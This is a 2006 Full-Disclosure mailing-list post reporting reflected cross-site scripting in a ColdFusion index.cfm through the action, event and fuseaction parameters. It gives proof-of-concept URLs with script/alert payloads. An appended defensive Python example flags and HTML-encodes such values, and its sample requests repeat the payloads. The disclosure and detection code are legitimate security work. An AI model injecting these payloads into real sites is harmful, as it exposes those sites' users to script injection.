Message-ID: <20060719131250.54352.qmail@web34301.mail.mud.yahoo.com>
Date: Wed, 19 Jul 2006 06:12:49 -0700 (PDT)
From: saied hackeriran <saiedhackeriran@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Subject: New Problem in Index.cfm
In The Name Of God
Discoverer: SaiedHacker
Group: HackeranShiraz
Critical Level: Dangerous
This matter happens in index.cfm when we want to run some specific
functions such as action, event, ... and a hacker can start attacks
such as an XSS attack by using simple script or HTML code.
Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>
XSS:
Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script>
Have fun
SaiedHackerIran@...oo.com
www.SaiedHackerPro.PersianBlog.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
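
For defenders, an added example (not part of the original post) that flags requests to index.cfm whose action, event or fuseaction value is not a plain identifier, and shows an HTML-encoded form of echoing such a value. It assumes legitimate values are short dotted identifiers; the function names and sample requests are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Dispatcher parameters named in the post.
DISPATCH_PARAMS = {"action", "event", "fuseaction"}
# Assumption: legitimate values look like "home" or "home.view".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]+(\.[A-Za-z0-9_]+)*")
MAX_LEN = 64  # assumed upper bound for a dispatcher value


def suspicious_dispatch_params(request_target):
    """Return (name, decoded value) pairs that fail the allow-list check."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/index.cfm"):
        return []
    hits = []
    # parse_qsl percent-decodes, so encoded and raw markup are treated alike.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in DISPATCH_PARAMS:
            continue
        if len(value) > MAX_LEN or not SAFE_VALUE.fullmatch(value):
            hits.append((name.lower(), value))
    return hits


def render_unknown_action(value):
    """Echo a rejected value in an error message only after HTML-encoding it."""
    return "<p>Unknown action: " + html.escape(value, quote=True) + "</p>"


def scan(request_targets):
    """Map each flagged request target to its offending parameters."""
    flagged = {}
    for target in request_targets:
        hits = suspicious_dispatch_params(target)
        if hits:
            flagged[target] = hits
    return flagged


# Constructed sample request targets, as they might appear in an access log.
SAMPLE_REQUESTS = [
    "/path/index.cfm?action=home.view",
    "/path/index.cfm?event=%3Cscript%3Ealert(1)%3C/script%3E",
    "/path/index.cfm?fuseaction=<script>alert(1)</script>",
    "/path/other.cfm?action=<b>",
]

if __name__ == "__main__":
    for target, hits in scan(SAMPLE_REQUESTS).items():
        print(target, hits)
```

The same allow-list check can sit in front of the dispatcher itself, so that a value that fails it is rejected before it reaches any template.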